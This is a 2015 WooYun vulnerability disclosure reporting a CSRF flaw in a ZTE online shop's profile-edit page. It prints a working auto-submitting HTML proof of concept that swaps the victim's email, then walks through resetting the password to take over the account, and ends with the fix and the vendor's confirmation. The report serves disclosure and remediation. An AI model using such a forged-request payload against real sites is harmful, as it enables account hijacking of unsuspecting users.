当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153119

漏洞标题:中兴某站点开我链接号就会被盗号(附POC)

相关厂商:中兴通讯股份有限公司

漏洞作者: harbour_bin

提交时间:2015-11-10 10:06

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:CSRF

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-19: 厂商已经确认,细节仅向厂商公开
2015-11-29: 细节向核心白帽子及相关领域专家公开
2015-12-09: 细节向普通白帽子公开
2015-12-19: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

1、因为怕给业务造成影响, 自己注册了帐号qidoublebins@163.com进行测试

2.png


2、分析个人中心-基本信息, 发现存在CSRF, 我们构造POC:

<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="Generator" content="EditPlus®">
<meta name="Author" content="">
<meta name="Keywords" content="">
<meta name="Description" content="">
<title>Document</title>
</head>
<body>
<form method="post" action="http://www.ztemall.com/%E5%AE%A2%E6%88%B7/%E4%BF%AE%E6%94%B9" id="edit">
<input name="客户名称" type="text" value="王磊">
<input name="真实姓名" type="text" value="">
<input name="身份证号" type="text" value="">
<input name="电话号码" type="text" value="18551813244">
<input name="性别" type="text" value="男">
<input name="省" type="text" value="江苏省">
<input name="省代码" type="text" value="320000">
<input name="市" type="text" value="南京市">
<input name="市代码" type="text" value="320100">
<input name="修改邮箱" type="text" value="是">
<input name="电子邮箱" type="text" value="wooyun_test@163.com">
</form>
</body>
<script>
document.getElementById("edit").submit();
</script>
</html>


说明: 1)因为涉及到中文, 所以在记事本中构造会乱码, 因此使用editplus进行编辑; 2)“修改邮箱”这个参数的默认是 否, 将其改为是. 3)手机号稍微注意一下,不要重复即可. POC构造完成如上图所示.
3、点击后修改成功

3.png


4、当链接被触发后, 攻击者可通过找回密码的方式, 进行密码重置, 简单展示

5.png


6.png


邮箱找回密码

7.png


默认密码修改为wooyun1234
5、登录后,成功盗号

4.png


8.png


漏洞证明:

已证明!

修复方案:

添加token;
处理好相关业务逻辑.

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-19 14:43

厂商回复:

漏洞说明中有一处小错误,一直没能完全复现,再加上乌云升级,所以确认延迟了。抱歉!现在问题已经解决,感谢提交

最新状态:

暂无